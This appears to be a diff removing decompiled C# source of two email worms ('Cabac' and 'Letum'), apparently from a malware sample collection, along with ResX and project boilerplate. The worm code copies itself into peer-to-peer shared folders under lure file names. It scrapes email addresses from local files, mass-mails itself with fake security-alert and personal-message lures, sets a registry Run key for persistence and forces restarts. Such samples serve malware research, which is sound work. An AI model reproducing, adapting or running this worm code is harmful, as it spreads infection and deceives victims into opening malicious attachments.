File.Copy(Application.ExecutablePath, "D:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\winampa2.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\project.exe");
File.Copy(Application.ExecutablePath, "J:\\Program Files\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\screen_saver!.scr");
File.Copy(Application.ExecutablePath, "F:\\Program Files\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
File.Copy(Application.ExecutablePath, "H:\\Program Files\\Kazaa\\My Shared Folder\\fun.pic.scr");
}
catch (Exception ex)
{
}
}
private void eerrorr_Tick(object sender, EventArgs e)
{
api.MessageBeep(20);
api.SHRestartSystemMB(0, "Windows", 1);
}
}
}

View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

View File

@ -1,198 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Form2
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System;
using System.ComponentModel;
using System.Drawing;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;
using System.Web.Mail;
using System.Windows.Forms;
namespace Mcafee
{
public class Form2 : Form
{
private IContainer components;
public Form2() => this.InitializeComponent();
private void Form2_Load(object sender, EventArgs e)
{
}
private void amir(object sender, EventArgs e)
{
this.Hide();
try
{
for (int index = 0; index < 6; ++index)
{
string str1 = new string[20]
{
"mcafee",
"symantec",
"Yahoo!",
"Norton! ",
"Text message",
"NOD32",
"Important bill! ",
"Message Notify ",
"Fax Message",
"Protected message",
"Cum a murit Papa?",
"Encrypted document",
"Account notify",
"E-mail account disabling warning",
"E-mail technical support message.",
"E-mail warning",
"Email account utilization warning.",
"Fax Message Received ",
"Pentru Ionel",
"IranSare2008"
}[new Random().Next(0, 20)];
string str2 = new string[5]
{
"AmirCivil.pic.cmd",
"register.pif ",
"sexy-screensaver.scr ",
"fullmessenger.exe",
"readme.html.cmd"
}[new Random().Next(0, 5)];
string str3 = new string[20]
{
"nice stuffs i got here... ",
"Message Error",
"i've got cool stuffs here... ",
"i want you to know how much i care for you... ",
"hello! i'm your long, lost friend... ",
"kindness is a virtue... ",
"sharing files is the essence of living... check this out... ",
"hi, friend... here are some nice stuffs that i got from the internet... check it out... ",
"hmmmn... i guess you've forgotten me... but anyways, i wanna make up... here are the files that made me like the internet more... see for yourself...",
"one of the files is a virus... can you tell me which one is it? hehehe, i'm only joking... your friend, paul.. ",
"classroom test of you? ",
"old photos about you? ",
"i hope thats not true! ",
"three files for you to keep... always remember that i'm into deep... i don't know you but i think i'm in love... ",
" you know amir_civil?!",
"Ioana, sex in grup in camin. Cred ca o stii si ",
"another pic, have fun! ... :->",
"Credeti ca ar fi mai bine ca Romania sa-si retraga trupele din Irak anul acesta?Deschideti programul Vot, alegeti votul dvs. si vedeti rezultatele.Parerea dvs. conteaza!",
"the information is wrong! ",
"Credeti ca ar fi mai bine ca Romania sa-si retraga trupele din Irak anul acesta?Deschideti programul Vot, alegeti votul dvs. si vedeti rezultatele.Parerea dvs. conteaza! "
}[new Random().Next(0, 20)];
string searchPattern = new string[3]
{
"*txt",
"*html",
"*xml"
}[new Random().Next(0, 3)];
string str4 = new string[20]
{
"mcafee@yahoo.com",
"symantec@yahoo.com",
"nod32@yahoo.com",
"panda@yahoo.com",
"avg@yahoo.com",
"password@yahoo.com",
"info@yahoo.com",
"ebook@yahoo.com",
"LongShot@yahoo.com",
"pic@yahoo.com",
"update@yahoo.com",
"matt@yahoo.com",
"steve@yahoo.com",
"smith@yahoo.com",
"stan@yahoo.com",
"bill@yahoo.com",
"bob@yahoo.com",
"YourFriend@yahoo.com",
" mail@yahoo.com",
"ted@yahoo.com"
}[new Random().Next(0, 20)];
string path = new string[5]
{
"C:\\",
"D:\\",
"E:\\",
"G:\\",
"F:\\"
}[new Random().Next(0, 5)];
try
{
string[] strArray = new string[1]
{
"C:\\windows"
};
foreach (string str5 in strArray)
{
foreach (string file in Directory.GetFiles(path, searchPattern))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray)))
{
string str6 = match.ToString();
try
{
MailMessage message = new MailMessage();
message.From = str4;
message.To = str6;
message.Cc = "info@yahoo.com";
message.Bcc = "password@yahoo.com";
message.Subject = str1;
message.Body = str3;
SmtpMail.SmtpServer = "mx4.mail.yahoo.com";
message.Attachments.Add((object) new MailAttachment(Application.ExecutablePath, MailEncoding.Base64));
SmtpMail.Send(message);
}
catch (Exception ex)
{
}
}
}
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex)
{
}
}
private void timer1_Tick(object sender, EventArgs e)
{
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form2);
this.Text = nameof (Form2);
this.Activated += new EventHandler(this.amir);
this.Load += new EventHandler(this.Form2_Load);
this.ResumeLayout(false);
}
}
}

View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

View File

@ -1,22 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Program
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System;
using System.Windows.Forms;
namespace Mcafee
{
internal static class Program
{
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
}
}
}

View File

@ -1,46 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Properties.Resources
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Mcafee.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (Mcafee.Properties.Resources.resourceMan == null)
Mcafee.Properties.Resources.resourceMan = new ResourceManager("Mcafee.Properties.Resources", typeof (Mcafee.Properties.Resources).Assembly);
return Mcafee.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Mcafee.Properties.Resources.resourceCulture;
set => Mcafee.Properties.Resources.resourceCulture = value;
}
}
}

View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

View File

@ -1,21 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Properties.Settings
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Mcafee.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}

View File

@ -1,14 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyCopyright("Copyright © 2006")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("9c6ecbe9-0863-4001-8a94-b8cc1b696c55")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Letum")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Letum")]
[assembly: AssemblyVersion("1.0.0.0")]

View File

@ -1,47 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Letum</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Letum</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Letum22\Letum.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Letum", "Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.csproj", "{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,32 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Form1
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using System.ComponentModel;
using System.Windows.Forms;
namespace Letum
{
public class Form1 : Form
{
private IContainer components;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.AutoScaleMode = AutoScaleMode.Font;
this.Text = nameof (Form1);
}
public Form1() => this.InitializeComponent();
}
}

View File

@ -1,259 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Letum22.Letum
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace Letum22
{
public class Letum
{
private static Module self;
private static string pferrie = "peter_ferrie@symantec.com";
private static string[] nSubject = new string[7]
{
"Warning!",
"Virus Alert",
"Customer Support",
"Re:",
"Re:Warning",
nameof (Letum),
"Virus Report"
};
private static string[] nData = new string[3]
{
"Dear Users\r\n\r\nDue to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.\r\n\r\n Regards\r\n Security Response",
"Hiya,\r\n\r\n I've found this tool a couple of weeks ago, and after using it i was surprised on how good it was on squashing viruses. I wonder if avers know about this? ;)",
">>\r\n Maybe not but try this, i'm sure it will help you in your fight against malware. The engine it uses isnt to bad, but the searching speed is very fast for such a small size "
};
private static ArrayList List = new ArrayList();
[STAThread]
private static void Main()
{
Random random = new Random();
Thread thread1 = new Thread(new ThreadStart(Letum.nntp));
Thread thread2 = new Thread(new ThreadStart(Letum.smtp));
Letum.self = Assembly.GetExecutingAssembly().GetModules()[0];
Letum.CollectDirs("C:\\", Letum.List);
int index = random.Next(0, Letum.List.Count);
string str = Letum.List[index].ToString();
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Retro", true);
if (registryKey1 == null)
{
registryKey1 = Registry.CurrentUser.CreateSubKey("Software\\Retro");
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
}
File.Delete(registryKey1.GetValue(nameof (Letum)).ToString());
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey2.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
registryKey2.Close();
thread1.Start();
thread2.Start();
if (random.Next(0, 1983) != random.Next(0, 1983))
return;
int num = (int) MessageBox.Show("Dear Peter Ferrie \n\nGeNeTiX is a person not a f**king genetically modified food product. \nShe's not happy you called her that! \n\nRegards", "Name Entry Error", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
private static void nntp()
{
TcpClient tcpClient = new TcpClient();
ArrayList arrayList = new ArrayList();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
int startIndex1 = 0;
object obj1 = (object) null;
